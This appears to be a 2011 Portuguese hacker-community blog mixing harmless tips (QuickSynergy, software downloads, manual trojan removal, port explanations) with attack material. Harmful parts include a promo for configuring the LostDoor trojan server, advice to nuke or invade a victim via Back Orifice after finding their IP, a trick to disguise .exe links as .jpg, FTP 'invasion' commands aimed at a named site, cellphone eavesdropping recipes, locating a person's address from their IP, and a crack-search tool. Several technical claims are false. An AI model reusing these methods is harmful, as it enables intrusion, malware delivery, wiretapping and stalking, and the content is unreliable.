Boa vindas

BEM VINDOS
A comunidade hacker's escola do futuro é uma comunidade que foi criada com o objetivo de compartilhar informações e conhecimentos do mundo virtual.
O objetivo maior desse blog é facilitar a vida de todos os nossos membros e usuários da rede que desejam aprender um pouco mais sobre esse mundo que vem crescendo cada vez mais.
Aproveitem!


Noticias:

quarta-feira, 8 de junho de 2011

Compartilhando teclado e mouse com até 5 máquinas

A dica é muito útil quando você tem que lidar com 2 máquinas ao mesmo tempo. Às vezes, ligo meu notebook ao lado do desktop para trabalhar e uso o mesmo mouse e teclado para ter mais agilidade.


Para começar, baixe o pacote quicksynergy. Vá em Aplicativos > Central de Programas do Ubuntu e busque por quicksynergy:





Mande instalar nas duas máquinas, a que vai compartilhar o teclado e o mouse, e a outra que vai usá-los.


Em seguida, na máquina que tem o teclado e o mouse a serem compartilhados, abra o programa em Aplicativos > Acessórios > QuickSynergy.





Deixe na aba Compartilhar, como na imagem acima, onde você pode configurar a posição de onde ficará a outra máquina. Funciona assim: no meu exemplo deixei a outra máquina à direita. Então, quando passo o mouse da borda direita da tela, o cursor já “cai” no outro monitor e o teclado também passa a funcionar para a outra máquina. É muito simples e rápido.


Então, escolha a posição onde vai ficar (virtualmente) a outra máquina e digite um nome qualquer, que será o “nome de tela” que será o mesmo nome configurado nas duas máquinas. No meu exemplo usei “note”. Depois clique em Executar.


Mas antes você precisa configurar a outra máquina.


Abra também o QuickSynergy e vá na aba Usar.





Digite o IP da máquina (leia mais abaixo se não sabe achar o IP) que está com o teclado e o mouse compartilhados e no “Nome de tela” digite o nome que configurou acima. Clique em Executar e pronto. Brinque com o mouse de um lado pro outro e vai ver que já está funcionando.


Obs: Existe também versões para Windows e para Mac, e você pode controlar máquinas com SOs diferentes.


Obs2: Além do objetivo original, também é legal para sacanear os colegas de trabalho e controlar a máquina deles enquanto estão usando . Mas nunca fiz isso e sei que vocês também não vão fazer…


Como descobrir meu IP no Ubuntu
Clique com o botão direito no ícone de rede (à direita e acima);
Clique em “Informações da conexão”;
Copie o que está em “Endereço IP”


segunda-feira, 30 de maio de 2011

Como localizar um ip












Como alguns usuários tinham algumas dúvidas de como rastrear um IP decidi postar esse tutorial feito pelo SPYNET...simples mas muito bom para iniciantes..Rastreando ipEscrito por SPYNETAchei esses links interessantes, eles mostram a Cidade/País/CEP de um IP informado.E claro, não é 100% correto mas dá pra ter uma idéia legal do endereço.Então vamos há algumas explicações dos passos para rastrear um IP.Primeiro é bom distinguir IPs nacionais dos internacionais, no Brasil a faixa inicial geralmente são:200.x.x.x e 201.x.x.x, não é regra, há alguns com 207.x.x.x por exemplo mas não é tão comum.É necessário saber isto para agilizar sua busca, pois não adianta procurar no sistema de consulta de CEPs um IP lá da China.Mas como cérebro foi feito pra lembrar a programação da TV e não números, aqui vai a solução:http://www.maxmind.com/app/lookupInforme o IP, e será mostrado de qual ele pertence.

Agora entendendo um pouco de como os sistemas de buscas relacionam CEPs com IPs:Bom tudo começa das estruturas físicas da rede, físico me refiro a fios, postes, caixas telefônicas, localização do provedor, etc. Quando você recebe um IP, seu provedor gera ele apartir do seu CEP(não é bem um cálculo com seu CEP e sim questão de proximidades).Explico: Supomos que você recebeu o IP 200.196.196.5 e seu vizinho recebeu 200.150.30.2, sendo que ele mora no mesmo CEP que vc,o que aconteceria é que o ping(tempo para recebimento de pacotes) demoraria(suposição) uns 150ms(isso é lento, sim eu amo parenteses :lol.O que na realidade deveria ser uns 70ms mais ou menos.Então o provedor lhe atribui IPs conforme seu CEP, sendo assim seu vizinho provavelmente receberá um IP semelhante ao seu, pelo menos na teoria seria assim, ao menos que se escasse os IPs semelhantes, mas aí é outro papo.Entendido isso de CEP x IP, vamos a forma de rastreá-los.
Há um projeto nacional chamado IPGeo mantido pelo Portal RankBrasil, que mantêm um banco de dados com uma relação imensa de IPs -> CEPs. Bom ao certo de onde eles colhem essas informações eu não sei, suponho que seja algo vinculado aos provedores e ao Registro.br.Então vamos lá, acesse o site: http://www.ipgeo.com.br/E informe o IP que deseja consultar, como exemplo vou usar o meu atual: IP 200.203.3.62O que vai acontecer, o sistema irá sempre mostrar uma série de resultados, pois são os IPs mais semelhantes ao seu, caso encontreexatamente o IP informado, ele irá ser mostrado no topo da lista.Resultado obtido:CitarProximidades de IP com CEPs confirmados200.203.3.62 95020180 Caxias do Sul RS200.203.3.63 95180000 Farroupilha RS200.203.3.63 95700000 Bento Gonçalves RS200.203.3.64 95020320 Caxias do Sul RS200.203.3.64 95020460 Caxias do Sul RS200.203.3.64 95097000 Caxias do Sul RS200.203.3.65 95010100 Caxias do Sul RSPróximo passo, como localizou meu IP exato, procurei no site dos correios o CEP que me apresentou.http://www.correios.com.br/servicos/cep/cep_cep.cfmE olhem o resultado:Sim, o endereço tá correto mesmo, aqui da empresa.Ah detalhe bastante importante, MEU IP NÃO É FIXO NEM EMPRESARIAL.Agora acontece também de não mostrar o IP informado e sim só os das proximidades, então caso saiba mais informações(como a cidade por exemplo) sobre o IP que está consultando, lhe ajudará a filtrar os resultados mostrados.Acontece também de não mostrar corretamente a cidade, acredito que ocorre pois o banco de dados pode estar desatualizado, sendo que é feito a nova verificação a cada 24h, então caso tenha certeza que o resultado mostrado está incorreto, anote o IP e consulte novamente dentro de algumas horas ou no dia seguinte.Básicamente para IPs nacionais seria isso, como eu falei não é 100% mas ajuda.

Ainda em buscas no Brasil temos outro recurso que é o Registro.br(http://www.registro.br)/.Já essa alternativa é mais adequada de quando estamos consultando IPs(fixos) de servidores, os quais estão registrados um dominío, um IP fixo empresarial, etc.Caso consultar um IP dinâmico qualquer, provavelmente os resultados serão os dados do companhia de telecomunicações da região, como Brasil Telecom.Exemplo, consultei pelo meu IP:Citar...inetnum: 200.203.0/17asn: AS8167ID abusos: BTA17entidade: Brasil Telecom S/A - Filial Distrito Federaldocumento: 076.535.764/0326-90responsável: Brasil Telecom S. A. - CNRSendereço: SEPS 702/092 Cj. B - Bl B 3 andar Gen. Alencastro, S/N,endereço: 70390-025 - Brasilia - DFtelefone: (61) 415-4201 []ID entidade: BTC14ID técnico: BTC14inetrev: 200.203.0/24servidor DNS: ns3.brasiltelecom.net.br...Agora outra consulta, mas pelo IP 200.176.3.142Citar...inetnum: 200.176/16asn: AS11706ID abusos: ABT82entidade: Terra Networks Brasil S.A.documento: 091.088.328/0003-29responsável: Hostmaster Terra Networksendereço: João Manoel, 90,endereço: 90010-030 - Porto Alegre - RStelefone: (51) 32844000 []ID entidade: MPL4ID técnico: MPL4inetrev: 200.176.0/18servidor DNS: ns1.terra.com.br...Como deu pra notar, é o IP do terra.com.br, então essa é a diferença de um IP registrado.

Mas e no caso de um IP que não seja do Brasil ?Bom aí se fizermos pelo método anterior não teremos resultados precisos. Para isso há outro site americano, MaxMindque disponibiliza recursos semelhantes ao IPGeo.Acesse: http://www.maxmind.com/app/lookup_cityE a teoria é a mesma, porém como é outro país o sistema de caixa postal (CEP) será diferente.Então como saber onde procurar, aqui:http://www.embassyworld.com/data/Zip_Codes.htmlhá uma listagem de serviços e sites que buscam códigos postais de diversos países.Vamos a um exemplo na prática!Enquanto estava no painel de administração do Fanta Hackers observei que tinha um visitante com IP do exterior, esse: 65.214.39.151Fiquei curioso e resolvi rastrear ele, vamos aos passos:- Descobrindo País/Cidade/EstadoResultado:- Como ninguém nasceu de susto, vamos confirmar realmente se o MaxMind trouxe informações boas. Para isso consultaremos também no Whois (http://whois.lacnic.net/) que é o substituto do Registro.br mas para consultar internacionais.Então tudo certo, os dados estão corretos mesmo:CitarOrgName: AskJeeves, Inc.OrgID: C00555427Address: 5858 Horton StreetCity: EmeryvilleStateProv: CAPostalCode: 94608Country: USBom essa foi fácil, como deu pra notar é um IP empresarial no qual já nos mostrou inclusive o nome da organização AskJeeves- Uma consulta rápida no oráculo pela empresa e chegamos à http://www.ask.com/- Pra quem deduziu, descobrimos já quem é nosso visitante. Como trata-se de um portal de buscas, o nosso convidado é um WebBot que esta catalogando os dados contidos no Fanta.Mas vamos continuar a busca:- Acessehttp://maps.google.com/ e informe o nome da empresa AskJeeves- Altere o modo de visualização para Hybrid(imagem de satélite + nomeclatura de ruas)- Ao lado, irá nos mostrar uma listagem de diversas filiais da empresa, como já sabemos que a desejada encontra-se em Emeryville - California, selecionamos esta.- Chegamos ao resultado preciso abaixo:Alguém quer fazer uma visita a eles?-------Porém como citei antes, essa foi fácil, localizar uma empresa não é nada complicado. Mas e no caso de um usuário internacional comum?Nesse ponto nossos recursos se restringem um pouco, mas vamos ver até onde conseguimos chegar.Nosso IP de exemplo será: 69.18.1.201- Consultando a localizaçãowww.maxmind.com/app/lookup_city- O que identificamos: Local Internet Service Company, bom agora complicou pois não é tão simples como antes, descobrimos que o IP é de um Provedor de Internet.Ou seja, um usuário comum.- Seguimos direto para o Google Maps e informamos os dados da cidade:- Nesse caso o melhor modo de visualização é Map;- Como essa cidade Fairfield parece ser o lugar onde o diabo perdeu as meias, o zoom no mapa é bem limitado:- Então vamos tentar no MapQuest(http://www.mapquest.com/) e informamos o código postal: 52556Bom, um pouco mais detalhado...Com isso as informações que temos, consiguimos chegar até este ponto, não obtivemos o endereço específico, mas uma noção boa da localização.

Bom, então o passo-a-passo que eu sugestionaria para iniciar um rastreamento seria os seguinte:- Analise o IP e descubra qual seu país;http://www.maxmind.com/app/lookup- Sabendo a nacionalidade:* Se for nacional:1) Consulte nohttp://www.registro.br/2) Se constatar que o IP não está registrado, pesquise novamente em http://www.ipgeo.com.br/3) Tendo o CEP em mãos, consulte elehttp://www.correios.com.br/servicos/cep/cep_cep.cfm* Caso seja internacional:1) Busque primeiro no Whois:http://whois.lacnic.net/2) Senão retornar nada útil tente em:http://www.maxmind.com/app/lookup_city3) Descoberto o país, consulte em http://www.embassyworld.com/data/Zip_Codes.html4) Acesse algum dos sites da lista referente ao país do IP5) Busque pelo código postal localizado6) Caso seja americano, uma boa dica é procurar no Google Maps- E se não conseguiu com nenhuma dessas alternativas, bom aí só resta ligar para o provedor do IP, e tentar passar uma engenhariasocial convencendo eles a te darem os dados do IP. O que eu acho quase impossível, a menos que vc seja da PF.  rsrsrsrsrsrs

sexta-feira, 27 de maio de 2011

Odin Blu-ray to WMV Ripper 5 Portable


Odin Blu-ray to WMV Ripper é um poderoso software conversor de DVD Blu-Ray para o formato WMV. Contando com uma interface intuitiva e amigável, ele pode converter com excelente qualidade. Suporta vários dispositivos, incluindo WMV Zune, Creative Zen, Pocket PC, Palm etc, podendo ripar também blue-ray audio para qualquer dispositivo multimídia!


FILESERVE

segunda-feira, 23 de maio de 2011

Colocando músicas do 4Shared no seu perfil do Orkut!

Publicado por Diablos 4-Ever Dia 20 de maio de 2011 em Orkut, Tutoriais | Nenhum Comentário | 135 Acessos


Nível: Básico
Aplicativo necessário: Editor de texto
Número de passos: 8

O Orkut é uma rede social que continua agradando muitos por disponibilizar inúmeras funções de personalização do perfil, e uma delas é a possibilidade de colocar músicas na sua descrição pessoal.

Hoje, vamos ensiná-lo como inserir música do 4Shared, que oferece uma grande biblioteca musical, no seu perfil. Quando as pessoas o visitarem na rede social, a música tocará automaticamente. Acompanhe o passo a passo para ativar essa funcionalidade:

Passo 1. Acesse o 4Shared. Busque pelo artista ou nome da música desejada no campo de pesquisa e clique em “Search”.

Passo 2. Selecione a música que você quer clicando no nome dela. Uma tela parecida com a imagem abaixo será exibida. Confira se é mesmo a música que você quer adicionar ao Orkut.



Passo 3. Agora vamos encontrar o endereço (link) do MP3 hospedado no 4Shared. Para isso, clique com o botão direito do mouse na página e escolha a opção “código fonte”. Pressione as teclas de atalho Ctrl+F, no seu navegador, e busque por “preview.mp3”

Passo 4. Copie toda a url do arquivo, do “http://” até o “.mp3”, como você pode ver na imagem abaixo. Então, abra um editor de texto (pode ser o Notepad ou o Word) e cole o link obtido.



Passo 5. Agora copie o código a seguir:

<center><embed type=”application/x-shockwave-flash” src=”http://www.4shared.com/flash/player.swf” style=”" height=”20″ width=”289″ quality=”high” flashvars=”autostart=true&file=LINKDOARQUIVO“></embed></center>

Passo 6. Substitua o trecho “LINKDOARQUIVO’ pelo link copiado no 4Shared, sem alterar mais nada!



Passo 7. Faça login no seu Orkut. Vá em “Perfil” e dê um clique duplo na caixa de descrição do seu profile.

Passo 8. Clique em HTML (um ícone representado por um lápis), cole o código feito no editor de texto e clique em “Salvar”. Digite as letras de verificação que surgirem na imagem para confirmar, e depois clique em “OK”



Confirme o captcha exigido pelo Orkut.

Pronto!

Criando e Configurando Server LostDoor Black Pro v5.1






Nesta video aula eu mostro como criar e configurar corretamente o server do trojan LostDoor Black Pro v5.1.













by: Invasão Hacker

quinta-feira, 28 de abril de 2011

Kit de Ferramentas do FBI



Download   Kit de Ferramentas do FBI


FBI Forensic Field Kit  Ferramentas Bootable Forense
Um dos Melhores senão o kit hacker ja Melhor Liberado, kit hacker Esse disponabiliza Programas Proibidos Foi Liberado hacker dark fbi Pelo Ele invadiu o Servidor fazer Todas fbi buscou fontes de instação dos Programas Que o fbi E.U.A.! n Indispensavel Quem UM TEM ja Pouco de Conhecimento e deseja se Tornar UM hacker. 

Ferramenta Forensics:

Sleuth Kit Kit-Forensics
Py-Flag - Forensics Browser
Autopsy - Forensics Browser para Sleuth Kit
DCFLdd - Imaging DD Tool ferramenta de linha de comando e também funciona com AIR
lugar - Dados Carver ferramenta de linha de comando
Air - Forensics GUI Imaging
md5deep - MD5 hash Programa
netcat - Command Line
cryptcat - Command Line
NTFS-Tools 
qtparted - GUI ferramenta de particionamento
regviewer - Windows Registry Viewer
X-Ways WINTRACE
X-Ways WinHex
X-Ways Forense
R-Studio Emergência (mídia inicializável de recuperação Maker)
R-Studio Network Edtion
R-Studio Agent RS
residente Net
Faces 3 Full (600 megas)
Encase 4,20
Kit de Manuais de Campo 
Resposta a Incidentes - Computer Forensics
Computador investigação criminal
Patologia Forense
Internet Forensics
Forense interpretação das provas
Windows Forensics
Computação Forense-Um Dicionário Ilustrado
Computer Forensics - jumpstart
Programas ADICIONAIS Boot DVD: 
Gentoo Linux 2.6 Kernel - Opyimized para Uso Forense
XFCE - GUI
Apache2 - Servidor
Mysql PHP4
Open Office
Gimp - Programa Graphics
KSnapshot - Programa de captura de tela
Mozilla 
Gnome CD Master
K3b - CD Burner
XMMS - media player
Vigia - Gentoo Gerenciador de Pacotes Gráficos
Karchiver - GUI GZIP
Ferramentas de segurança:
Etherape - Traffic Network Monitor GUI
Clamv - Anti Virus
snort - Command Line
John the Ripper - Command Line cracker senha
rkhunter - Command Line
Ethereal - Analisador de Tráfego de Rede
Fwbuilder - App Firewall GUI
nessus - scanner de rede


Tudo Full!

Tamanho: 1.38GB
Idioma: Inglês


terça-feira, 19 de abril de 2011

Microsoft Safety Scanner 1.0



O Microsoft Safety Scanner é um programa distribuído gratuitamente pela Microsoft que realiza uma busca completa em seu computador a fim de localizar e eliminar ameaças como vírus e malwares. Além de ser bem fácil de utilizar, a ferramenta não requer nenhum tipo de instalação. Tudo o que você precisa fazer é executar o arquivo baixado e seguir as instruções.

Download

Weeny Free Video Conversor 1.1


Converter vídeos para outros formatos não é uma tarefa difícil, e por vezes isso é muito necessário. Muitos editores e players multimídia não rodam determinados formatos de arquivo, e, nesses casos, a solução é buscar um conversor e realizar a mudança.
O Weeny Free Video Conversor é um aplicativo que facilita esse processo, tornando-o muito mais rápido e eficaz. Ele consegue ler a maior parte dos formatos disponíveis no mercado, como AVI, MP4, 3GP, RMVB, VOB, MPG, FLV, entre outros.

Download

Panda USB and AutoRun Vaccine 1.0


Não é difícil encontrar alguém que já tenha tido problemas com o “autorun” de pendrives e de outros equipamentos portáteis de armazenamento. Esse arquivo é responsável por executar automaticamente dispositivos USB e, justamente por essa função, é alvo constante de infecção por malwares.
Para garantir que tanto o computador quanto o dispositivo portátil estejam livres da ação de arquivos maliciosos, nada melhor do que uma vacina. Uma das boas opções disponíveis atualmente é o Panda USB and AutoRun Vaccine, pois ele trabalha para imunizar seus equipamentos.

Download

quarta-feira, 13 de abril de 2011

Retirar manualmente um Cavalo de Tróia

Quando os Antivírus Falham. Como podemos Retirar manualmente um Cavalo de Tróia (Trojan) do Windows XP ou Vista sem precisar de ferramentas do tipo Disco de Boot?


1º Passo - Tecle Ctrl + Ald + Del, depois clique em Geranciador de Tarefas, e verifique a existência do trojan em execução. Normalmente só é exibido ele na janela que mostra os aplicativos em execução.

2º Passo - Clique em Iniciar, depois clique em Executar e digite: msconfig, depois clique em OK, vá até a Guia Inicializar, e procure arquivos com nomes extranhos que fica neste caminho, C:\WINDOWS ou C:\WINDOWS\SYSTEM32 , normalmente, os vírus trojans ficam na pasta system32, mas eles podem ficar alojados em outras pastas do windows. A melhor maneira de ter essa certeza, é instalar um bom antivírus, e scanear a sua máquina para que eles detectem, daí quando ele encontrar o vírus, anote imediatamente o caminho e o nome do arquivo. Os antivírus conseguem detectar, mais eles não conseguem eliminar, pois estes vírus são protejidos e ocultos. Alguns antivírus executam a verificação antes de entrar no Sistema Operacional onde poderia ser possível a eliminação, mas muitos deles falham.




3º Passo - Agora que você já sabe o caminho e o nome do arquivo executável (que é o nosso cavalo de tróia), para eliminar, reinicie sua máquina, e após passar a mensagem que pede para entrar  no setup, mantenha a tecla F8 pressionada até exibir um Menu de opções numa tela preta.

4º Passo - Entre na opção que fala sobre (Modo Seguro em Prompt de Comando passo a passo). Ele vai entrar numa janela DOS onde você terá de ter conhecimento dos comandos do MS-DOS para operar. Clique aqui para você ter uma pequena noção sobre os comandos do MS-DOS.

5º Passo - Digite: CD\WINDOWS\SYSTEM32 , depois tecle Enter. Agora que estamos na pasta ou diretório System32, vamos listar o arquivo OLESVI.EXE que é o nome do nosso trojan, você pode fazer o mesmo com o seu trojan. Basta digitar:DIR  /A  OLESVI.EXE . Digite também DIR  /A OLESVI*.DLL para ver se existem também arquivos (.DLL) que acompanham este trojan. Observação: Você pode depois digitar este comando DIR ?  para visualizar todos os parâmetros que pode ser usados com o comandos DIR
.
6º Passo - Digite DEL  /A  /F  OLESVI.EXE ,  o arquivo executável foi eliminado. Se no passo 5º você encontrou arquivos com o mesmo nome e com a extenção .DLL , faça o mesmo, apague-o. Para ter certeza se apagou, use novamente o comando DIR.

7º Passo - Tecle Ctrl + Alt + Del, depois clique em Desligar. Ligue novamente seu PC. Após entrar no windows, repita o passo 2, e veja que o caminho que chama o trojan ainda está lá, mas não se preocupe, pois este é apenas um registro em aberto, e você pode remove-lo pelo regedit, antes de vermos isto, desmarque o quadradinho que fica ao pado do caminho que chama o trojan, (Veja a figura acima).

8º Passo - Existem aplicativos que limpam os registros abertos do windows, mas se você não têm então vamos lmpar manualmente. Clique em Iniciar, depois executar, digite: regedit, após abrir o registro do windows, Tecle Ctrl + F e digite o nome OLESVI.EXE que é o nome do nosso trojan em exercício. Clique no botão Localizar Próxima. Quando aparecer ao lado o nome OLESVI.EXE, na primeira coluna Nome, clique com o botão direito do mouse e clique em Excluir. (Não tenha medo!) Depois vá teclando sempre F3 no teclado para localizar o próximo registro com este mesmo nome, e vá sempre excluindo.



ESPERO TER AJUDADO

segunda-feira, 11 de abril de 2011

Skype 5.2.60.113



Hoje em dia, muitos programas permitem que o usuário faça ligações pela internet. Até mesmo mensageiros populares como o Windows Live Messenger são capazes de proporcionar ao usuário ligações e chamadas em vídeo. No entanto, se existe um programa que se tornou sinônimo de ligação gratuita na web, esse aplicativo é o Skype.
Com visual renovado, novos recursos e integração com redes sociais, o Skype 5 promete conquistar uma boa fatia de mercado, em especial o público corporativo, que passa contar com um recurso exclusivo de videoconferência em grupos. Ou seja, você poderá falar e visualizar diversas pessoas ao mesmo tempo, desde que todos eles tenham a mesma versão do aplicativo.

Download

Plan Your Room



O Plan Your Room é uma excelente alternativa para quem deseja elaborar o projeto básico da estrutura e decoração de imóveis, sem a preocupação de instalar nada. Este serviço online permite a criação de plantas fantásticas, com a vantagem de não pesar no navegador.
Levante paredes, instale portas ou janelas e carregue móveis sem fazer esforço. Use este aplicativo e planeje a casa dos seus sonhos como se fosse um arquiteto ou decorador profissional!


Link

SPlayer 3.6 Build 1975



Ao escolher um programa para se tornar o player de vídeos padrão do computador, é necessário levar em consideração três fatores: a forma com que os comandos disponíveis são apresentados ao usuário, se é necessária ou não a instalação de um pacote de codecs adicionais e, o mais importante, o quanto o programa exige da capacidade do computador utilizado.
Infelizmente, a maioria dos casos que reúnem as duas primeiras características fazem isso ao custo da terceira, o que resulta em softwares bonitos e fáceis de usar, mas que precisam de um bom computador para isso. O SPlayer é uma grata surpresa em meio a este cenário, oferecendo ao usuário uma série de opções de reprodução diferentes ao mesmo tempo em que exige muito pouco do computador.


Download

terça-feira, 5 de abril de 2011

Descobrindo o poder do Ms-dos



Bom meus queridos vizitantes hj nessa tarde de Domingo dia 11 nós tomamos coragem e atualizamos o site com algumas coisas novas do vosso interesse quero que vc si divirta-se quebrando a proteção de alguns modens atráves do Ms de comando


Invadindo por IP-TCP


Todo mundo que tem o ms-dos instalado em seu computador, por isso, quase todo
mundo,

não sabe que tem um potente rastreador de endereço IP em sua
máquina.

Mas antes de tudo o que é endereço ip? Endereço IP é um
número que você recebe na

hora em que conecta ao seu servidor. Um exemplo de endereço IP é 200.200.200.200.
Os

três primeiros números representam o D.N.S. de seu servidor, e
o último o número que

varia. No Brasil, todos os IPs começam com 200.

Para rastrear você deve usar um programa chamado arp, que faz parte do
ms-dos. O

comando que deve ser digitado é arp -a. Você verá uma lista
de endereços IP. Mas como

saber qual é o IP da pessoa? Você deve ter certeza de que a última
informação que

chegou no seu modem veio da pessoa que você quer descobrir o IP, e daí entrar
com o

comando no prompt do ms-dos. O IP da pessoa será o primeiro.

Também existem outros programas como o netstat. Com ele você pode
rastrear qual é o

servidor da pessoa e outros. Mas esse programa é mais complicado, se
você quer saber

como usá-lo digite netstat -h , e a tela de ajuda aparece.

O que fazer com o endereço IP? Você pode nukar a pessoa. O nuke é um
programa que

envia uma mensagem de erro a porta 139, fazendo a conexão da vítima
cair. Você também

pode invadir o computador da pessoa usando o Back Orifice ou outro programa.



Cuidado, seu host e seu ip foram rastreados:

4 maneiras de rastrear chamadas de celular

Aviso: Escuta clandestina é um crime previsto por lei e da cana! Por isso aprenda a correr seus riscos, eu não me responsabilizo por nemhum de seus atos.

Ultilizando aparelhos motorola.

Primeiro tire a bateria do seu celular , depois de abrir o celular ira ter umas partes de metal embaixo do celular ,Três riscos de metal ||| , pegue um pedaço de papel alumínio e bote nos riscos de metal ,depois bote a bateria ,e ligue o celular, ira acontecer umas coisas , digite #1008# e depois de digitar o numero é só ouvir as conversas telefônicas.

Ultilizando aparelhos Ericson.

1 - Pressione a tecla FCN e com ela pressionada apertar os números 90- 40- 59.
2 - Solte a tecla FCN. Deverá aparecer na tela a mensagem TESTE INPUT.
3 – Aperte então 1 * 1 # 01 # #.
4 - Pronto, você entrou no canal 01, para ir mudando de canais basta ir apertando a tecla de volume até achar alguma conversa interessante.
5 - Para tirar do modo de escuta, você deve retirar a bateria do celular.

Ultilizando aparelhos de televisão.

Este texto contém informações consideráveis que ensinam como fazer escuta celular
via TV(pode se necessário usar o manual da TV). Nos avisamos que fazer escuta
celular é ilegal de acordo com a ECPA, e estas informações são exclusivamente para
uso e propósito educacional não nos responsabilizamos pelo mal uso das
informações aqui contidas. TV VHF canais 70 - 83 pegue a melhor distribuição do
melhor tronco usado pelos celulares. Este é o que distribui nesse fluxo. Sintonize
esses canais ajustando-os a sua atual freqüência e você estar preparado para fazer
a escuta. Cada canal da TV obrigara 5Mhz com ótimo controle de sintonia. Se
mesmo assim você não tiver uma freqüência exata você precisará ler sobre
freqüência e você terá uma boa idéia de como obter uma exata. Se a sensibilidade não
estiver boa mesmo você estando na cidade, ou perto de uma freqüência exata você
pegara alguma coisa. Você poderá também pegar transmissões de negócios no
tronco móvel se o mesmo estiver fechado, as transmissões não serão ilegais a
menos que a conversa esteja codificada então você poderá usar a velha TV para
achar outro local de negócios que use freqüências entre 800Mhz ou mais.

Ultilizando um rádio comum.

Os telefones em questão, são telefones sem fio. Eles transmitem suas ondas por
FM. Sendo assim, o que você tem que fazer é descobrir a freqüência. Mas, tem as
suas restrições. À não ser que seja um rádio com uma antena muito forte, ele tem
que ficar perto da base do telefone. Uma freqüência que descobri é 93,9MHz, mas
não quer dizer que todas sejam assim. E não é ligar apenas ligar o rádio e escutar.
Leva-se um tempinho para poder sintonizar. Mas depois de sintonizada no ponto
exato, você poderá escutar perfeitamente.

CAMUFLA VIRUS EM ENDEREÇOS

Ola pessoal
eu recebi um link muito estranho do meu amigo
ele me passo para eu ver, ele tmb acho estranho

Código:

http://www.dfold.net/zeroboard/fotos.exe#/fotolog/fotosacidentes_ontem/fotos.jpg


ai comecei a estudar o link

como vcs podem perceber existe um sinal de "#"

e cliquei na minha maquina virtual so que o link acima esta quebrado.

intow como eu sou curioso peguei um .exe e comecei a colocar uns codigos
e acabei achando uma coisa legal

Código:

http://pwp.netcabo.pt/0176170301/down/elifoot2007pt2.exe#/fotolog/img.jpg

O link acima é o

jogo
Elifoot 2007, mais porem olhem que o final esta
".jpg"
nao preciso dizer mais nada né ?

criatividade esta ai para usar e abusar ...

INVADINDO SERVIDORES FTP

Introdução

Essa bug tem em quase todos os server's ftp, mas no ftp vc pode ser descoberto
em 15 segundos(ou não)!



Códigos

Vamos usar esses códigos:

quote user ftp

quote cwd ~root

quote pass ftp



Go!

Primeiro abra o CMD e digite ftp

então digite open sua vitima ex: open pspiso.com

em nome de user e senha aperte enter

vai dar falha no login então digite

quote user ftp


e digite quote cwd ~root

e então quote pass ftp


Pronto você esta dentro agora sem feichar o CMD abra o Internet Explorer

e digite
ftp://vitima pra
mim ficou
ftp://pspiso.com
e transfira o que vc quiser.

domingo, 3 de abril de 2011

BestPractice 1.03


BestPractice é o software (em português) ideal para quem está aprendendo a tocar, seja qual for o instrumento musical, suas canções favoritas. Ele é capaz de diminuir/aumentar o andamento da música para você ouvir as notas ou até mesmo tocá-las simultaneamente com o seu instrumento preferido, por exemplo.

Atualmente existem vários softwares de áudio desenvolvidos para auxiliar e ensinar alunos de música, contudo a grande maioria é focada na parte teórica ou técnica, como por exemplo, o Guitar Pro — programa pago capaz de exibir as notas para vários instrumentos. Já BestPractice tem outro foco: é ótimo para quem gosta de tirar músicas de ouvido ou tocar juntamente da música, alterando a velocidade das passagens.

Download

Craagle V4.0 Final


O Craagle é um software que possui como principal funcionalidade, pesquisar por seriais e cracks de programas pagos Craagle é um programa para a busca automatizada de números de série e geradores de chaves para inúmero software e aplicações, disponibilizando uma busca rápida e fácil.
Suporta configuração de proxy.

Download

quarta-feira, 30 de março de 2011

Como fechar as portas do seu computador

Computadores e equipamentos informatizados podem se comunicar uns com os outros através de padrões estabelecidos que ditam como cada participante da conversa deve se comportar. O padrão utilizado na Internet (e na maioria dos sistemas atuais) é o chamado "Cliente/Servidor". Você certamente já ouviu falar disso mas, afinal, do que se trata?

A comunicação em um ambiente cliente/servidor é composta de dois módulos básicos um módulo que faz requisições de serviços - cliente - e outro que recebe estes pedidos para executar as tarefas pedidas - servidor- e, eventualmente, retornar o resultado desta tarefa. Você utiliza enormemente este esquema durante sua conexão Internet. Por exemplo, o seu navegador - que é o programa cliente - fez um pedido ao programa servidor instalado nos computadores onde estão hospedadas as páginas deste site, que o recebeu e respondeu com a página pedida - esta que você está lendo agora. O mesmo acontece quanto você verifica seus e-mails, baixa arquivos etc.

Como você já deve ter imaginado, a maior parte dos programas utilizados no seu computador só precisa fazer pedidos e esperar a resposta, ou seja, são programas clientes. Teoricamente é isso o que deve acontecer, mas nem sempre nossos computadores são tão inofensivos. Os grandes vilões dos últimos anos são programas que invertem este papel, fazendo com que nossos computadores se tornem servidores. A maioria arrasadora vem na modalidade de "cavalos-de-tróia" (os famosos trojans), por isso se convencionou chamar este método de "invasão através de cavalos-de-tróia".

O que acontece, geralmente, é que um usuário recebe um programa de alguém, através de qualquer meio - por e-mail, ICQ, fazendo um download ou por disquete - e o executa em seu computador. Este programa, após ser executado, instala um "servidor" que passa a responder aos pedidos de conexão pela Internet, ou seja, seu computador adquire as características de um "servidor Internet". Os tipos de pedidos que ele pode aceitar e executar variam de acordo com o programa "servidor" instalado.

Uma característica presente neste tipo de comunicação é a necessidade de se atribuir "portas de comunicação" por onde os pedidos e as respostas irão passar. Todos os programas para uso na Internet se utilizam destas portas que geralmente são abertas com o intuito de fazer pedidos a servidores remotos. Quando um computador está, digamos, "infectado" por um programa servidor, este abre uma porta naquele, de forma a permitir que outros computadores façam pedidos através dela.

Com base nesta explicação, percebemos que não é necessário nem interessante impedir que nossos computadores abram portas. Se isso for feito, nenhum dos nossos programas irá funcionar. O que precisamos fazer é impedir que programas maliciosos abram portas para receber conexões! Através delas é que hackers ou crackers podem vasculhar seu computador.

E como fechar as portas? Simples, vamos usar um exemplo:

Eu vejo que meu computador tem uma porta aberta e sei que esta porta é referente ao programa de e-mail, pois eu estou checando minha caixa postal no provedor e sei que é necessário uma porta para isso. Se eu quiser fechá-la, basta fechar meu programa de e-mail. Parece simples, mas o problema é identificar a que programa uma porta está relacionada. Além desta identificação ser complexa, caso encontremos uma porta relacionada a um servidor malicioso precisaremos ainda encontrar o próprio programa servidor, que na grande maioria das vezes está escondido ou inacessível.

O ideal neste caso é deixar a identificação destes programas a cargo de outros programas especializados nessa tarefa. Ao encontrar e remover um programa servidor do seu computador, a porta associada a ele será automaticamente fechada, já que não há mais nenhum programa responsável por abri-la. Estes rastreadores podem ser programas especializados em procura de "servidores maliciosos" conhecidos ou mesmo programas antivírus, já que o método utilizado para se vasculhar o computador é semelhante ao utilizado para se encontrar um vírus.

